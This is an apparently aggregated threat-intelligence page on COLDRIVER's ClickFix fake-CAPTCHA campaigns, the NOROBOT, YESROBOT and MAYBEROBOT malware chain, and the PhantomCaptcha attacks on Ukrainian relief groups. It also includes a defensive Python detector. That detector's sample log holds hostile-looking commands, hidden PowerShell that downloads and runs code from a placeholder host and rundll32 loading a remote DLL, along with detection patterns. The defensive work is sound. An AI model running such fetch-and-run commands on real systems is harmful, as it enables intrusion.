COLDRIVER APT Group Uses ClickFix Tactics to Deliver BAITSWITCH and SIMPLEFIX Malware
Summary
The COLDRIVER APT group, also known as Star Blizzard, has intensified its operations since May 2025, rapidly developing and refining its malware arsenal. The group has launched a new campaign using ClickFix tactics to deliver three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. These malware families are connected via a delivery chain and target individuals and organizations connected to Russia, including NGOs, human rights defenders, and think tanks. The attack chain involves tricking victims into running a malicious DLL via a fake CAPTCHA check, leading to the deployment of the SIMPLEFIX backdoor. The malware exfiltrates specific file types and establishes communication with a command-and-control server. The campaign aligns with COLDRIVER's known victimology, focusing on civil society members connected to Russia. The group has been active since 2019, using spear-phishing and custom tools like SPICA and LOSTKEYS. The latest campaign demonstrates the group's continued use of effective infection vectors, despite their lack of technical sophistication. The malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively. The COLDRIVER group has been deploying the new malware set more aggressively than any previous campaigns. The new malware set replaces the previous primary malware LOSTKEYS, which has not been observed since its public disclosure in May 2025. The attack starts with a 'ClickFix-style' phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they’re 'not a robot'. The malware uses a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and the Windows Registry. The malware fetches a self-extracting Python 3.8 installer, two encrypted Python scripts, and a scheduled task to ensure persistence. 
The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server. The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature. The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The COLDRIVER group has been constantly evolving the NOROBOT malware to evade detection systems. The group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly. The PhantomCaptcha campaign targeted Ukrainian regional government administration and organizations critical for the war relief effort, including the International Committee of the Red Cross, UNICEF, and various NGOs. The campaign began on October 8, 2025, and used a malicious "I am not a robot" CAPTCHA challenge to execute a PowerShell command, installing malware on victims' systems. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's infrastructure was active for just one day, with backend servers remaining online to manage infected devices. The PhantomCaptcha campaign is linked to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.
Timeline
- 21.10.2025 10:29 · 4 articles · 2d ago
COLDRIVER Develops and Deploys YESROBOT and MAYBEROBOT Malware
The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature. The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The COLDRIVER group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly. The COLDRIVER group initially used a Python backdoor dubbed YesRobot, which had limited functionality and made typical backdoor functionality cumbersome to implement. The COLDRIVER group abandoned YesRobot in favor of a new backdoor, MaybeRobot, also deployed via NoRobot. The COLDRIVER group has been making multiple changes to NoRobot, mainly focused on evading detection, and updating its infection chain as it transitioned to deploying MaybeRobot as the final stage.
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- 26.09.2025 15:45 · 7 articles · 27d ago
COLDRIVER Launches New Campaign Using BAITSWITCH and SIMPLEFIX Malware
The PhantomCaptcha campaign began on October 8, 2025, targeting Ukrainian relief organizations with phishing emails containing a malicious PDF. The PDF directed victims to a fake Zoom site hosted on Russian infrastructure, which executed a PowerShell command to install malware. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's infrastructure was active for just one day, with backend servers remaining online to manage infected devices. The operation is linked to a wider campaign involving malicious Android apps.
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
Information Snippets
- COLDRIVER, also known as Callisto, Star Blizzard, and UNC4057, is a Russia-linked threat actor active since 2019.
  First reported: 26.09.2025 15:45 · 4 sources, 5 articles
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The new campaign uses ClickFix tactics to deliver BAITSWITCH and SIMPLEFIX malware.
  First reported: 26.09.2025 15:45 · 4 sources, 6 articles
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- BAITSWITCH is a downloader that fetches the SIMPLEFIX PowerShell backdoor.
  First reported: 26.09.2025 15:45 · 3 sources, 4 articles
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The attack chain involves a fake CAPTCHA check to trick victims into running a malicious DLL.
  First reported: 26.09.2025 15:45 · 4 sources, 6 articles
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- SIMPLEFIX establishes communication with a command-and-control server to execute PowerShell scripts and commands.
  First reported: 26.09.2025 15:45 · 3 sources, 4 articles
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- The campaign targets members of NGOs, human rights defenders, think tanks, and individuals connected to Russia.
  First reported: 26.09.2025 15:45 · 4 sources, 5 articles
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The malware exfiltrates specific file types from pre-configured directories, similar to the LOSTKEYS malware.
  First reported: 26.09.2025 15:45 · 2 sources, 3 articles
- New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks — thehackernews.com — 26.09.2025 15:45
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- The COLDRIVER group has been rapidly developing and refining its malware arsenal since May 2025.
  First reported: 21.10.2025 10:29 · 4 sources, 4 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The new malware families, NOROBOT, YESROBOT, and MAYBEROBOT, are connected via a delivery chain.
  First reported: 21.10.2025 10:29 · 4 sources, 4 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The new attack waves use ClickFix-style lures to trick users into running malicious PowerShell commands.
  First reported: 21.10.2025 10:29 · 4 sources, 4 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.
  First reported: 21.10.2025 10:29 · 3 sources, 3 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The new infection chain commences with an HTML ClickFix lure called COLDCOPY.
  First reported: 21.10.2025 10:29 · 3 sources, 3 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- YESROBOT uses HTTPS to retrieve commands from a hard-coded command-and-control server.
  First reported: 21.10.2025 10:29 · 4 sources, 4 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- MAYBEROBOT is more flexible and extensible, equipped with features to download and run payloads from specified URLs.
  First reported: 21.10.2025 10:29 · 4 sources, 4 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER actors rushed to deploy YESROBOT as a stopgap mechanism before switching to MAYBEROBOT.
  First reported: 21.10.2025 10:29 · 4 sources, 4 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The use of NOROBOT and MAYBEROBOT is likely reserved for significant targets already compromised via phishing.
  First reported: 21.10.2025 10:29 · 3 sources, 3 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- NOROBOT and its infection chain have undergone constant evolution to evade detection systems.
  First reported: 21.10.2025 10:29 · 3 sources, 3 articles
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The Netherlands' Public Prosecution Service suspects three 17-year-old men of providing services to a foreign government, potentially linked to COLDRIVER.
  First reported: 21.10.2025 10:29 · 1 source, 1 article
- Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers — thehackernews.com — 21.10.2025 10:29
- The COLDRIVER group has been deploying the new malware set more aggressively than any previous campaigns.
  First reported: 21.10.2025 13:02 · 3 sources, 3 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The new malware set replaces the previous primary malware LOSTKEYS, which has not been observed since its public disclosure in May 2025.
  First reported: 21.10.2025 13:02 · 3 sources, 3 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The attack starts with a 'ClickFix-style' phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they're 'not a robot'.
  First reported: 21.10.2025 13:02 · 3 sources, 4 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- The malware uses a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and the Windows Registry.
  First reported: 21.10.2025 13:02 · 3 sources, 4 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- The malware fetches a self-extracting Python 3.8 installer, two encrypted Python scripts, and a scheduled task to ensure persistence.
  First reported: 21.10.2025 13:02 · 3 sources, 4 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server.
  First reported: 21.10.2025 13:02 · 3 sources, 4 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature.
  First reported: 21.10.2025 13:02 · 3 sources, 3 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025.
  First reported: 21.10.2025 13:02 · 3 sources, 3 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks.
  First reported: 21.10.2025 13:02 · 3 sources, 3 articles
- Russian Coldriver Hackers Deploy New 'NoRobot' Malware — www.infosecurity-magazine.com — 21.10.2025 13:02
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group has been constantly evolving the NOROBOT malware to evade detection systems.
  First reported: 21.10.2025 18:13 · 2 sources, 2 articles
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly.
  First reported: 21.10.2025 18:13 · 2 sources, 2 articles
- Russian hackers evolve malware pushed in "I am not a robot" captchas — www.bleepingcomputer.com — 21.10.2025 18:13
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group, also known as Star Blizzard, Callisto, ColdRiver, Seaborgium, and UNC4057, has been active since at least 2019 and is publicly linked to Russia's Federal Security Service (FSB).
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group has been using a new backdoor in attacks after its LOSTKEYS malware was detailed in a public report in June 2025.
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group started using new malware families within days of the public disclosure of LOSTKEYS and never deployed LOSTKEYS again.
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group dropped the PowerShell infection chain, opting instead to rely on the victim's execution of a malicious DLL via rundll32.
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group has been using the ClickFix technique to deliver the LOSTKEYS malware as part of a multi-stage infection chain that also involved the use of a first-stage PowerShell script.
  First reported: 22.10.2025 15:03 · 2 sources, 2 articles
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- The COLDRIVER group has been luring victims to pages masquerading as information resources for members of civil society and think tanks in Russia and convincing them to execute malicious commands in the Windows Run box.
  First reported: 22.10.2025 15:03 · 2 sources, 2 articles
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
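The two snippets above describe the defender-relevant mechanics of this chain: a command pasted into the Windows Run box, which Explorer then launches, and a DLL executed via rundll32 rather than a PowerShell stager. The following is an added detection example written for this page, not code from any of the cited articles or from Google or Zscaler. It scans process-creation telemetry for the combination a ClickFix paste produces (an interpreter or LOLBin whose parent is explorer.exe, plus a URL or UNC path or hidden/encoded PowerShell flags). The log format (one JSON object per line with pid, parent_image, image and command_line), the sample events, the example.invalid hostnames and the scoring thresholds are all constructed assumptions, loosely modelled on Sysmon event 1 / Windows 4688 fields.

```python
"""Flag ClickFix-style launches in process-creation telemetry (added example).

Assumes a constructed log format: one JSON object per line with the fields
pid, parent_image, image and command_line. Not tied to any vendor's schema.
"""
import json
import re

# Interpreters and LOLBins typically launched by a pasted Run-box command.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "mshta.exe"}
# A parent of explorer.exe is the telemetry proxy for "typed into Win+R / Explorer".
USER_SHELL_PARENTS = {"explorer.exe"}

# A URL or a UNC path (\\host\share) in the command line: the payload is remote.
REMOTE_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.IGNORECASE)
# Hidden window, encoded command, or expression evaluation in PowerShell.
PS_SUSPICIOUS_RE = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden"
    r"|-(?:e|ec|enc|encodedcommand)\b"
    r"|\biex\b|invoke-expression",
    re.IGNORECASE,
)

# Constructed sample events (hostnames use the reserved .invalid TLD).
SAMPLE_LOG = r"""
{"pid": 4101, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -w hidden -c \"iex (iwr http://captcha.example.invalid/verify)\""}
{"pid": 4102, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\rundll32.exe", "command_line": "rundll32 \\\\files.example.invalid\\share\\bait.dll,Start"}
{"pid": 4103, "parent_image": "C:\\Windows\\System32\\svchost.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -File C:\\scripts\\backup.ps1"}
{"pid": 4104, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad notes.txt"}
{"pid": 4105, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd /c dir"}
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the list of ClickFix indicators present in one process-creation event."""
    reasons = []
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    if image in INTERPRETERS and parent in USER_SHELL_PARENTS:
        reasons.append("interpreter launched from user shell (Run box / Explorer)")
    if REMOTE_RE.search(cmd):
        reasons.append("command line references a URL or UNC path")
    if image in {"powershell.exe", "pwsh.exe"} and PS_SUSPICIOUS_RE.search(cmd):
        reasons.append("hidden/encoded/expression-evaluating PowerShell flags")
    return reasons


def is_clickfix_candidate(event: dict) -> bool:
    """Require the user-shell parent plus at least one further indicator.

    A bare 'cmd /c dir' typed into the Run box is normal admin behaviour, so the
    parent alone does not fire; a remote payload or hidden PowerShell does.
    """
    reasons = classify(event)
    return any(r.startswith("interpreter launched") for r in reasons) and len(reasons) >= 2


def scan(lines) -> list[tuple[int, str, list[str]]]:
    """Scan JSON-lines telemetry; return (pid, image, reasons) for each candidate."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if is_clickfix_candidate(event):
            hits.append((event["pid"], basename(event["image"]), classify(event)))
    return hits


def demo() -> list[tuple[int, str, list[str]]]:
    """Run the scanner over the constructed sample log."""
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for pid, image, reasons in demo():
        print(f"pid {pid} ({image}): " + "; ".join(reasons))
```

Only events 4101 and 4102 are reported: the hidden PowerShell pulling from a URL and the rundll32 launch of a DLL on a UNC path, both with explorer.exe as parent. The scheduled-style PowerShell from svchost.exe and the plain `cmd /c dir` from the Run box are left alone, which is the false-positive trade-off the threshold in `is_clickfix_candidate` encodes. For after-the-fact triage, the Run box also leaves a per-user history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside the process lineage when a host is suspected of having executed a pasted command.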
- The COLDRIVER group has been using a malicious DLL, dubbed NoRobot by Google and BaitSwitch by Zscaler, to retrieve the next-stage payload and achieve persistence.
  First reported: 22.10.2025 15:03 · 2 sources, 2 articles
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- The COLDRIVER group initially used a Python backdoor dubbed YesRobot, which had limited functionality and made typical backdoor functionality cumbersome to implement.
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group abandoned YesRobot in favor of a new backdoor, MaybeRobot, also deployed via NoRobot.
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group has been making multiple changes to NoRobot, mainly focused on evading detection, and updating its infection chain as it transitioned to deploying MaybeRobot as the final stage.
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The COLDRIVER group has been rotating infrastructure and file naming conventions, the paths files were retrieved from and how those paths were constructed, and changing the export name and the DLL name.
  First reported: 22.10.2025 15:03 · 1 source, 1 article
- Russian APT Switches to New Backdoor After Malware Exposed by Researchers — www.securityweek.com — 22.10.2025 15:03
- The PhantomCaptcha campaign targeted Ukrainian regional government administration and organizations critical for the war relief effort, including the International Committee of the Red Cross, UNICEF, and various NGOs.
  First reported: 22.10.2025 16:37 · 2 sources, 2 articles
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
- The campaign started and ended on October 8, 2025, and involved significant infrastructure setup, with some domains registered at the end of March 2025.
  First reported: 22.10.2025 16:37 · 2 sources, 2 articles
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
- The attack used emails impersonating the Ukrainian President's Office, carrying malicious PDF attachments that linked to a domain impersonating the Zoom communication platform.
  First reported: 22.10.2025 16:37 · 2 sources, 2 articles
- PhantomCaptcha ClickFix attack targets Ukraine war relief orgs — www.bleepingcomputer.com — 22.10.2025 16:37
- PhantomCaptcha Campaign Targets Ukraine Relief Organizations — www.infosecurity-magazine.com — 22.10.2025 18:45
